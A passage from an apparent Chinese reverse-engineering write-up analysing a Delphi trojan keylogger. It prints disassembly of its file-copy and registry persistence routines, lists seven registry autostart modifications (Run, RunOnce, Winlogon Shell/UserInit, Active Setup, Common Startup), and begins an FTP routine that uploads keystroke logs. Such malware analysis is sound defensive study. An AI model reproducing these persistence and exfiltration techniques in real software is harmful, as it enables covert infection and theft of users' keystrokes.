CODE:00433856 call _Create_Dir_and_CopyFile
CODE:00433856
CODE:0043385B
CODE:0043385B loc_43385B: ; CODE XREF: _Set_Reg_Info+F1j
CODE:0043385B cmp byte ptr [ebx+4], 1
CODE:0043385F jnz short loc_433866
CODE:0043385F
CODE:00433861 call _Create_Winlogon_RegKey
CODE:00433861
CODE:00433866
CODE:00433866 loc_433866: ; CODE XREF: _Set_Reg_Info+103j
CODE:00433866 cmp byte ptr [ebx+5], 1
CODE:0043386A jnz short loc_433871
CODE:0043386A
CODE:0043386C call _Create_Winlogon_Shell_RegKey
CODE:0043386C
CODE:00433871
CODE:00433871 loc_433871: ; CODE XREF: _Set_Reg_Info+10Ej
CODE:00433871 xor eax, eax
CODE:00433873 pop edx
CODE:00433874 pop ecx
CODE:00433875 pop ecx
CODE:00433876 mov fs:[eax], edx
CODE:00433879 push offset loc_433893
CODE:00433879
CODE:0043387E
CODE:0043387E loc_43387E: ; CODE XREF: _Set_Reg_Info+135j
CODE:0043387E lea eax, [ebp+var_14]
CODE:00433881 mov edx, 5
CODE:00433886 call System::__linkproc__ LStrArrayClr(void *,int)
CODE:00433886
CODE:0043388B retn
CODE:0043388B
CODE:0043388C ; ---------------------------------------------------------------------------
CODE:0043388C
CODE:0043388C loc_43388C: ; DATA XREF: _Set_Reg_Info+14o
CODE:0043388C jmp unknown_libname_48 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043388C
CODE:00433891 ; ---------------------------------------------------------------------------
CODE:00433891 jmp short loc_43387E
CODE:00433891
CODE:00433893 ; ---------------------------------------------------------------------------
CODE:00433893
CODE:00433893 loc_433893: ; CODE XREF: _Set_Reg_Info+12Fj
CODE:00433893 ; DATA XREF: _Set_Reg_Info+11Do
CODE:00433893 pop ebx
CODE:00433894 mov esp, ebp
CODE:00433896 pop ebp
CODE:00433897 retn
CODE:00433897
CODE:00433897 _Set_Reg_Info endp
其中的
CODE:00433856 call _Create_Dir_and_CopyFile
是用来创建文件的。到这个 CALL 里看看:
CODE:00414C34 _Create_Dir_and_CopyFile proc near ; CODE XREF: _Set_Reg_Info+FAp
CODE:00414C34
CODE:00414C34 var_20 = dword ptr -20h
CODE:00414C34 var_1C = dword ptr -1Ch
CODE:00414C34 var_18 = dword ptr -18h
CODE:00414C34 var_14 = dword ptr -14h
CODE:00414C34 var_10 = dword ptr -10h
CODE:00414C34 var_C = dword ptr -0Ch
CODE:00414C34 var_8 = dword ptr -8
CODE:00414C34 var_4 = dword ptr -4
CODE:00414C34
CODE:00414C34 push ebp
CODE:00414C35 mov ebp, esp
CODE:00414C37 xor ecx, ecx
CODE:00414C39 push ecx
CODE:00414C3A push ecx
CODE:00414C3B push ecx
CODE:00414C3C push ecx
CODE:00414C3D push ecx
CODE:00414C3E push ecx
CODE:00414C3F push ecx
CODE:00414C40 push ecx
CODE:00414C41 mov [ebp+var_4], eax
CODE:00414C44 mov eax, [ebp+var_4]
CODE:00414C47 call System::__linkproc__ LStrAddRef(void *)
CODE:00414C47
CODE:00414C4C xor eax, eax
CODE:00414C4E push ebp
CODE:00414C4F push offset loc_414D35
CODE:00414C54 push dword ptr fs:[eax]
CODE:00414C57 mov fs:[eax], esp
CODE:00414C5A lea eax, [ebp+var_C]
CODE:00414C5D call _Get_System_Dir
CODE:00414C5D
CODE:00414C62 push [ebp+var_C]
CODE:00414C65 push offset asc_414D48 ; "\\"
CODE:00414C6A push [ebp+var_4]
CODE:00414C6D lea eax, [ebp+var_8]
CODE:00414C70 mov edx, 3
CODE:00414C75 call System::__linkproc__ LStrCatN(void)
CODE:00414C75
CODE:00414C7A mov eax, [ebp+var_8]
CODE:00414C7D call Sysutils::DirectoryExists(System::AnsiString)
CODE:00414C7D
CODE:00414C82 test al, al
CODE:00414C84 jnz short loc_414C96
CODE:00414C84
CODE:00414C86 push 0 ; lpSecurityAttributes
CODE:00414C88 mov eax, [ebp+var_8]
CODE:00414C8B call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414C8B
CODE:00414C90 push eax ; lpPathName
CODE:00414C91 call CreateDirectoryA ; 在系统目录下创建 pschost 目录,如 C:\WINDOWS\system32\pschost
CODE:00414C91
CODE:00414C96
CODE:00414C96 loc_414C96: ; CODE XREF: _Create_Dir_and_CopyFile+50j
CODE:00414C96 lea eax, [ebp+var_10]
CODE:00414C99 mov ecx, offset s->Copia_exe ; "\\copia.exe"
CODE:00414C9E mov edx, [ebp+var_8]
CODE:00414CA1 call System::__linkproc__ LStrCat3(void)
CODE:00414CA1
CODE:00414CA6 mov eax, [ebp+var_10]
CODE:00414CA9 call Sysutils::FileExists(System::AnsiString)
CODE:00414CA9
CODE:00414CAE test al, al
CODE:00414CB0 jnz short loc_414D02
CODE:00414CB0
CODE:00414CB2 push 0 ; bFailIfExists
CODE:00414CB4 push [ebp+var_8]
CODE:00414CB7 push offset asc_414D48 ; "\\"
CODE:00414CBC lea edx, [ebp+var_1C]
CODE:00414CBF xor eax, eax
CODE:00414CC1 call System::ParamStr(int)
CODE:00414CC1
CODE:00414CC6 mov eax, [ebp+var_1C]
CODE:00414CC9 lea edx, [ebp+var_18]
CODE:00414CCC call Sysutils::ExtractFileName(System::AnsiString)
CODE:00414CCC
CODE:00414CD1 push [ebp+var_18]
CODE:00414CD4 lea eax, [ebp+var_14]
CODE:00414CD7 mov edx, 3
CODE:00414CDC call System::__linkproc__ LStrCatN(void)
CODE:00414CDC
CODE:00414CE1 mov eax, [ebp+var_14]
CODE:00414CE4 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CE4
CODE:00414CE9 push eax ; lpNewFileName
CODE:00414CEA lea edx, [ebp+var_20]
CODE:00414CED xor eax, eax
CODE:00414CEF call System::ParamStr(int)
CODE:00414CEF
CODE:00414CF4 mov eax, [ebp+var_20]
CODE:00414CF7 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CF7
CODE:00414CFC push eax ; lpExistingFileName
CODE:00414CFD call CopyFileA ; 木马文件复制到新建的系统目录下的 pschost 目录中
CODE:00414CFD
CODE:00414D02
CODE:00414D02 loc_414D02: ; CODE XREF: _Create_Dir_and_CopyFile+7Cj
CODE:00414D02 mov eax, [ebp+var_8]
CODE:00414D05 push eax
CODE:00414D06 mov ecx, offset s->CommonStartup ; "Common Startup"
CODE:00414D0B mov edx, offset s->SoftwareMicrosoftWindowsCurrentversionExplorerUserShellFo ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00414D10 mov eax, HKEY_LOCAL_MACHINE
CODE:00414D15 call _Create_RegKey ; 把 HKEY_LOCAL_MACHINE\SOFTWARE
CODE:00414D15 ; \Microsoft\Windows\CurrentVersion\Explorer
CODE:00414D15 ; \User Shell Folders 的项 Common Startup
CODE:00414D15 ; 键值改为以上新建的目录
CODE:00414D15
CODE:00414D1A xor eax, eax
CODE:00414D1C pop edx
CODE:00414D1D pop ecx
CODE:00414D1E pop ecx
CODE:00414D1F mov fs:[eax], edx
CODE:00414D22 push offset loc_414D3C
CODE:00414D22
CODE:00414D27
CODE:00414D27 loc_414D27: ; CODE XREF: _Create_Dir_and_CopyFile+106j
CODE:00414D27 lea eax, [ebp+var_20]
CODE:00414D2A mov edx, 8
CODE:00414D2F call System::__linkproc__ LStrArrayClr(void *,int)
CODE:00414D2F
CODE:00414D34 retn
CODE:00414D34
CODE:00414D35 ; ---------------------------------------------------------------------------
CODE:00414D35
CODE:00414D35 loc_414D35: ; DATA XREF: _Create_Dir_and_CopyFile+1Bo
CODE:00414D35 jmp unknown_libname_48 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00414D35
CODE:00414D3A ; ---------------------------------------------------------------------------
CODE:00414D3A jmp short loc_414D27
CODE:00414D3A
CODE:00414D3C ; ---------------------------------------------------------------------------
CODE:00414D3C
CODE:00414D3C loc_414D3C: ; CODE XREF: _Create_Dir_and_CopyFile+100j
CODE:00414D3C ; DATA XREF: _Create_Dir_and_CopyFile+EEo
CODE:00414D3C mov esp, ebp
CODE:00414D3E pop ebp
CODE:00414D3F retn
CODE:00414D3F
CODE:00414D3F _Create_Dir_and_CopyFile endp
经过以上处理,会在注册表中作如下设置:
1、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 下创建 SCISound 项,键值为路径加木马文件名,带参数 /lanzateRunOnce
2、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 下的 Shell 项中添加木马文件路径+文件名
3、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 添加 svchost 项,键值为木马文件路径+文件名
4、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components 下创建项 {4fz8rk-15aq-16nc-23or4-2ke0fa051515},再在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4fz8rk-15aq-16nc-23or4-2ke0fa051515} 下创建项 StubPath,键值为木马路径加文件名,带参数 /lanzateActiveX
6、如果在系统目录(如 C:\WINDOWS\system32) 下创建了 pschost 目录,则把
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 的键值改为以上新建的目录
7、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 下的 UserInit 项中添加木马路径+文件名的键值
----------------------------------------------------------------------------------------------------------
四、键盘记录
键盘记录的我就不贴代码了,比较长。无非就是设定时器,扫描键盘,再生成记录文件。
最后还有个连接 FTP 的,会在 FTP 里创建 iklogs 目录,上传你机器上生成的记录,这里略过:
CODE:00432D30 _FTP_Work proc near ; DATA XREF: CODE:00431264o
CODE:00432D30
CODE:00432D30 var_178 = dword ptr -178h
CODE:00432D30 var_174 = dword ptr -174h
CODE:00432D30 var_170 = dword ptr -170h
CODE:00432D30 var_16C = dword ptr -16Ch
CODE:00432D30 var_168 = dword ptr -168h
CODE:00432D30 var_164 = dword ptr -164h
CODE:00432D30 var_160 = byte ptr -160h
CODE:00432D30 var_154 = dword ptr -154h
CODE:00432D30 var_8 = dword ptr -8
CODE:00432D30 var_4 = dword ptr -4
CODE:00432D30
CODE:00432D30 push ebp
CODE:00432D31 mov ebp, esp
CODE:00432D33 add esp, 0FFFFFE88h
CODE:00432D39 push ebx
CODE:00432D3A push esi
CODE:00432D3B push edi
CODE:00432D3C xor edx, edx
CODE:00432D3E mov [ebp+var_178], edx
CODE:00432D44 mov [ebp+var_174], edx
CODE:00432D4A mov [ebp+var_170], edx
CODE:00432D50 mov [ebp+var_16C], edx
CODE:00432D56 mov [ebp+var_168], edx
CODE:00432D5C mov [ebp+var_164], edx
CODE:00432D62 mov [ebp+var_4], edx
CODE:00432D65 mov [ebp+var_8], edx
CODE:00432D68 lea eax, [ebp+var_160]
CODE:00432D6E mov edx, off_406540
CODE:00432D74 call unknown_libname_68 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00432D74
CODE:00432D79 xor eax, eax
CODE:00432D7B push ebp
CODE:00432D7C push offset loc_433129
CODE:00432D81 push dword ptr fs:[eax]
CODE:00432D84 mov fs:[eax], esp
CODE:00432D87 mov ds:byte_437A3C, 1
CODE:00432D8E push 0
CODE:00432D90 push 0
CODE:00432D92 push 0
CODE:00432D94 push 1
CODE:00432D96 push offset s->Iexplore ; "iexplore"
CODE:00432D9B call InternetOpenA
--------------------------------------------------------------------------------
【版权声明】: 本文纯属技术交流, 转载请注明作者并保持文章的完整, 谢谢!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
